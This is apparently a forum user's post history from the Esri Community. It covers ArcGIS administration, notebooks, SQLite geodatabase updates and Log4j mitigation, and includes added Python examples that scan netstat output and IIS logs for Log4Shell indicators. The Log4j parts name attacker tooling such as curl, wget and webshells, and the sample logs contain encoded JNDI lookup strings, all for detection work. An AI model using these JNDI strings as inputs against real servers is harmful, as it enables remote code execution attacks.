POST
|
Thank you. This is exactly what I needed to recreate tile cache in a federated server. Your solution should be added to ESRI's documentation.
04-26-2022
10:53 AM
|
1
|
0
|
1874
|
POST
|
To provide an actionable answer to the question of "what does an exploit look like" there are a few quick and easy things that GIS administrators can check in their systems:

- Most adversaries use a different IP to scan than they do to listen for incoming victim machines - tracking listening IPs from known threat actors is far more valuable than scanning IPs. An outbound connection or listening wait from a GIS machine to a known threat actor listening IP may be the easiest IoC to scan for. This can easily be accomplished using NetStat in Windows.
- Activity or connection from a GIS machine's Java processes that does not conform to regular ESRI implementation parameters, such as Java child processes calling wget, curl, or powershell commands. This is another easy IoC review that can be undertaken by GIS administrators.
- Outbound LDAP and RMI and rogue JRMI or LDAP requests to external servers is a little more complex review but can be monitored in real time. If possible after determination if LDAP connections are required on your machines, blocking those connections is a good way to close the door entirely on that vector.
- Scanning for webshells is super important. Webshells are not only an IoC for successful Log4J exploitation, they are extremely common in other attacks.
- Scan for and detect payload execution on a machine for post-exploitation activities. Many of these activities will be easily noticed even if endpoint security is not up to date - crypto-currency mining software (one of the most common early post exploit activities) will consume the system's resources. Others that will generate unique signatures include Mirai and BazarLoader.

Let's keep the list going - what else will a successful exploit look like and what are the methods you are undertaking as you mitigate on your systems?
01-13-2022
10:52 AM
|
2
|
1
|
1545
|
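An added example, not part of the original post and not Esri code, of the NetStat and outbound LDAP/RMI checks listed in the post above: it parses `netstat -ano` output and flags connections to a watchlisted listener IP or from a Java PID to an external LDAP/RMI port. The netstat text, watchlist IP, Java PID and port set are constructed assumptions; on a live host the PIDs would come from the process list for java.exe.

```python
import ipaddress

WATCHLIST = {"203.0.113.50"}       # constructed stand-in for a threat-intel listener list
LDAP_RMI_PORTS = {389, 636, 1099}  # LDAP, LDAPS, RMI registry defaults (assumed scope)
JAVA_PIDS = {4120}                 # constructed; PIDs of the GIS machine's Java processes
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

# Constructed sample of Windows `netstat -ano` output.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:6443           0.0.0.0:0              LISTENING       4120
  TCP    10.0.0.5:49712         203.0.113.50:8443      ESTABLISHED     4120
  TCP    10.0.0.5:49713         10.0.0.20:389          ESTABLISHED     4120
  TCP    10.0.0.5:49714         198.51.100.23:1099     SYN_SENT        4120
  TCP    10.0.0.5:49720         198.51.100.80:443      ESTABLISHED     988
"""

def is_external(ip):
    """True when the address is outside the internal ranges listed above."""
    addr = ipaddress.ip_address(ip)
    return not addr.is_unspecified and not any(addr in net for net in INTERNAL_NETS)

def review(netstat_text, java_pids, watchlist):
    """Return (pid, foreign address, state, reasons) for each suspicious TCP row."""
    findings = []
    for line in netstat_text.splitlines():
        parts = line.split()
        if len(parts) != 5 or parts[0] != "TCP":   # skips headers and UDP rows
            continue
        _, _local, foreign, state, pid = parts
        host, _, port = foreign.rpartition(":")
        host = host.strip("[]")                    # IPv6 addresses are bracketed
        reasons = []
        if host in watchlist:
            reasons.append("watchlisted listener IP")
        if int(pid) in java_pids and is_external(host) and int(port) in LDAP_RMI_PORTS:
            reasons.append("Java process to external LDAP/RMI port")
        if reasons:
            findings.append((int(pid), foreign, state, reasons))
    return findings

if __name__ == "__main__":
    for finding in review(SAMPLE_NETSTAT, JAVA_PIDS, WATCHLIST):
        print(finding)
```

The internal LDAP connection to 10.0.0.20 is not flagged, which is why the post's advice to first determine whether LDAP is required matters before blocking.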
POST
|
Not aware of any successful exploit of an ESRI system. However, IoCs will rarely be visible if a perpetrator is successful. Log4J vulnerability is much like a door - an access route vs the actual objective which is often to move laterally and establish a further exploit somewhere else in the system.

We analyze our IIS logs using an increasingly complex REGEX filtering for 200 returns. A full RCE chain will require round trip communication - each day our logs see thousands of attempts being made to leverage Log4J holes. Every 200 return delivers a payload back to the offending IP and it is through following the successful 200 connections that also meet REGEX on which we undertake our exploit hunting exercises. We also combine that with system scanning using professional services that employ actual PoC to scan systems.

Entry prevention is really about layers. Network monitoring software, Perimeter firewalls, WAF, Load Balancer and Gateway configuration for security, system configuration to allow only the necessary ports and types of traffic and maybe most importantly component and version upgrades to the newest available versions when those versions are released. Cannot stress enough that users should follow ESRI guidance and upgrade to 10.9.1 to take advantage of better security under the hood within the actual components included in the 10.9.1 distribution. That's the last line of defense should someone make it through the other security layers that organizations implement.

We installed/uninstalled Pro on our datastore machine to undertake the mitigation scripting. Not the most elegant Python solution but easy to accomplish.
01-13-2022
09:54 AM
|
1
|
0
|
1624
|
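An added example, not the poster's regex and not Esri code, of the IIS log triage described in the post above: it reads W3C extended log lines, percent-decodes the request fields (repeatedly, to catch double encoding), matches JNDI lookup strings, and separates hits that returned 200 from the rest, grouped by client IP. The log lines, addresses and paths are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
INSPECT = ("cs-uri-stem", "cs-uri-query", "cs(User-Agent)", "cs(Referer)")

# Constructed sample in IIS W3C extended format (documentation-range IPs).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip cs(User-Agent) sc-status
2022-01-12 10:01:02 GET /arcgis/rest/services - 198.51.100.7 Mozilla/5.0 200
2022-01-12 10:01:05 GET /arcgis/rest/info f=%24%7Bjndi%3Aldap%3A%2F%2Fexample.invalid%2Fa%7D 203.0.113.9 curl/7.79 200
2022-01-12 10:01:09 GET /portal/home - 203.0.113.9 ${jndi:ldap://example.invalid/a} 404
2022-01-12 10:02:11 GET /arcgis/login q=%2524%257Bjndi%253Aldap%253A%252F%252Fexample.invalid%252Fa%257D 203.0.113.44 Mozilla/5.0 200
"""

def fully_decode(value, max_rounds=3):
    """Percent-decode until the value stops changing (handles double encoding)."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def triage(log_text):
    """Map client IP -> {'status_200': [...], 'other': [...]} for JNDI-matching requests."""
    fields = []
    hits = defaultdict(lambda: {"status_200": [], "other": []})
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # column order comes from the log itself
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split(" ")))
        if not any(JNDI_RE.search(fully_decode(row.get(k, ""))) for k in INSPECT):
            continue
        bucket = "status_200" if row.get("sc-status") == "200" else "other"
        hits[row.get("c-ip", "?")][bucket].append(
            f"{row['date']} {row['time']} {row['cs-uri-stem']}")
    return dict(hits)

if __name__ == "__main__":
    for ip, buckets in triage(SAMPLE_LOG).items():
        print(ip, buckets)
```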
POST
|
Ran the GitHub check:

- 10.9.1 GIS Server ships with log4j 2.14.1. Have not checked other components in 10.9.1.
- 10.8.1 Enterprise has a mix including 2.11.1.

ESRI public release states (for 10.8.x and up) that "You will still see vulnerable Log4j version numbers on these systems, however it is not exploitable as their Java Runtime Environments (JRE) do not execute the code."

Be careful with logic when thinking that 10.3.1 and other older versions with 1.x are not vulnerable simply because not popping in the check. From Apache for those on older/EOL Enterprise:

Please note that Log4j 1.x has reached end of life and is no longer supported. Vulnerabilities reported after August 2015 against Log4j 1.x were not checked and will not be fixed.

Hope this helps.
12-13-2021
03:15 PM
|
1
|
0
|
3596
|
POST
|
We have a couple workarounds in play in my org. Jupyter Notebook custom shortcuts to open JN on the UNC path. VS Code (though ESRI won't officially support it). VS Code is ideal for working in Notebooks as the user can go back and forth between all utilized code platforms in the same interface and work with PY files on the same screen as .IPYNB or open multiple IPYNB at the same time in the same screen (copying code blocks from one to the other). Current limitation on VS Code with ESRI JN is that map widgets don't work but I use it all the time with ESRI notebooks for enterprise administration + data maintenance where map widget not needed. Also build my notebooks in it then open them in either JN or Pro if map widget required for end user. VS Code for ESRI also makes linting easy.
10-14-2021
06:03 PM
|
1
|
0
|
2582
|
POST
|
+1 this error started showing up recently on our server 10.8.1 and appears to be related to utility network services in our system.
10-14-2021
05:51 PM
|
1
|
0
|
1892
|
POST
|
Thanks for the replies. Using the DLL solution looks promising. Will try it out. In my case it's not a spatial function that's needed though. It's a non-spatial table edit that's not working. We bang the entire dataset up against a 3rd party API which returns a new data table containing the results of the bangup. We then import that table using ESRI tools into a database. Update query later performed to add certain values from the returned table to certain rows in the spatial table based upon a non-spatial table join and a where clause. SQL logic works fine if we take the extra step of moving the data from the mobile geodatabase to an enterprise geodatabase and then moving it back. Extra steps using extra tools as a workaround to functionality that should already be available in SQLite and is available in the non-ESRI SQLite. Alternatively, using ESRI tools to create a permanent table join, perform table update in Python, delete extra fields works. Again extra steps when SQLite can handle the entire process with 2 lines of SQL code already. And magnitudes of time slower in performance than acting directly on the database through SQL. The SQL is fairly basic, summarized in this example: UPDATE table1 SET columnX = (SELECT columnY FROM table2 WHERE table1.column1 = table2.column1); As a precursor to this we run an unmatched query using a left outer join to determine what data gets sent to the API for return with new field data for update/integration into the SQLite DB. Ideal solution would be one where scheduling or manually running a single SQL script to run on the database would handle the weekly data update. This kind of functionality is also something we are hoping someday extends to file geodatabases as well. Support requirement is for offline users who are often working with no internet connection.
07-22-2021
10:59 AM
|
0
|
1
|
663
|
POST
|
Thanks for the valuable information in this thread. Super important disclaimers noted here that ESRI should be making public to potential users of SQLite made from Pro. I've been stuck trying to make a simple update query work (like was totally possible with MS Access) in a Mobile Geodatabase and getting the "no such function: UpdateIndexEntry" error. Spent the last day trying to troubleshoot my machine b/c the query functions perfectly fine in SQL Fiddle and DB Fiddle using test data via SQLite but was erroring out locally in DB Browser and DBeaver. If we can't update attribute data in SQLite it's a show stopper limitation for the work I need to be doing with attribute tables on feature classes - updating hundreds of thousands of attributes manually not an option, nor is field calculator due to the slowness of Python [SQL not available for SQLite in Field Calculator]. Updatecursors cumbersome, again because of the Python translation that's needed to work with DBs to undertake the kind of work that we need done. SQL native is simplest, fastest, and best approach.
07-20-2021
03:05 PM
|
0
|
0
|
673
|
POST
|
+1 affected by this problem. Working with a project that runs entirely on UNC paths b/c it gets worked with via a batch server on the network and multiple data servers are involved, not just a specific machine. When trying to create a new notebook or "add" a Notebook in the Pro 2.7.3 project for creating and working with pandas to explore data am denied by the UNC error message "Cannot load a notebook from a UNC path" in both the default and clone environments. UNC Notebooks working fine in my environment from outside of ArcGIS Pro in Command Line, Jupyter shortcuts, and even VSCode.
04-29-2021
07:04 PM
|
1
|
0
|
3477
|
BLOG
|
Not sure if anyone answered your question regarding making it work with Enterprise. The answer is yes it will work with any 'portal' whether that portal is enterprise on premises, cloud, or arcgisonline. Just enter the details of the portal under the login comment at the top.

    # Log in
    username, password = provide_credentials()
    my_agol = GIS("https://yourEnterprise.com/PortalWebadaptor", username, password)

If the variable name "my_agol" seems a bit like a mental roadblock, you can rename it throughout the script to something like "my_portal". Egge-Jan shared a highly adaptable and fantastically useful nugget of code here that makes short work of pulling info into spreadsheets about users and groups. If like me you want the code to work on all your portals without much modification there are a few things you can do such as automatically naming your output csv by pulling the portal name directly via implementation of "my_portal.properties.portalName" in the fname= variable.
10-05-2020
05:49 PM
|
0
|
0
|
1547
|
BLOG
|
Easiest way to get it to automatically open in Excel as a table is to change the delimiter to a comma from a semicolon. Since we can use whatever delimiters we wish the decision on what to include here is based on the needs of the client application that will be consuming the output.
10-05-2020
01:49 PM
|
1
|
0
|
1547
|
POST
|
Yep. Spyder notebooks does what I need - mostly using it for code validation/qc and integrating arcpy. When it comes time to run things into production functionality I switch back over to a Jupyter environment for the graphical capabilities. As an aside, found the issue with the NodeJS npm error when bringing Jupyter Labs online with Pro's environment - jupyterlab_server package included with Pro required a package update to make it compliant with the newer jupyterlab package. Got everything working in Pro 2.6.1 Jupyter Labs including matplotlib and jupyter dashboards.
09-17-2020
01:50 AM
|
0
|
2
|
1219
|
POST
|
New to ArcGIS PowerShell DSC deployment. Receiving an error that I can't figure out with base deployment. Have combed the interwebs and git site. Not readily finding an answer. Anyone have an idea whether this is a user problem or something else and what the path to resolution might be? Have tried on multiple machines with same result. Thanks
09-08-2020
11:09 PM
|
0
|
0
|
336
|
POST
|
Working now ... even Spyder Notebooks. Have only tested basic functionality so don't know if anything is still amiss. https://community.esri.com/message/950872-re-another-pro-26-clone-problem?commentID=950872#comment-950872
08-29-2020
11:25 AM
|
0
|
4
|
1219
|
POST
|
Got everything working in the clone. Found that in my clones something was going wrong with the installers - behavior was not as expected. NodeJS was particularly troublesome. It was installing but the required updates to associated packages were not being installed no matter how I tried. It was also only able to install 14.9 even though I tried to force lower versions. Ended up updating all packages in the default clone manually then trying nodejs again. At that point 10.13.0 installed and it all came together. No more npm errors. Able to get jupyter lab running properly. Then installed Spyder and Spyder Notebook. Everything working now but to get it working had to delete my older clones and the contents of C:\Users\user\AppData\Local\ESRI\conda\ and start over. BTW: found that one of the problems I was encountering with Spyder was this bug in the hover tool. Simply disabled hover ability to fix. - Spyder 4.0.0 Tool Tips Thanks everyone who gave me assistance on this ...
08-29-2020
11:17 AM
|
0
|
1
|
894
|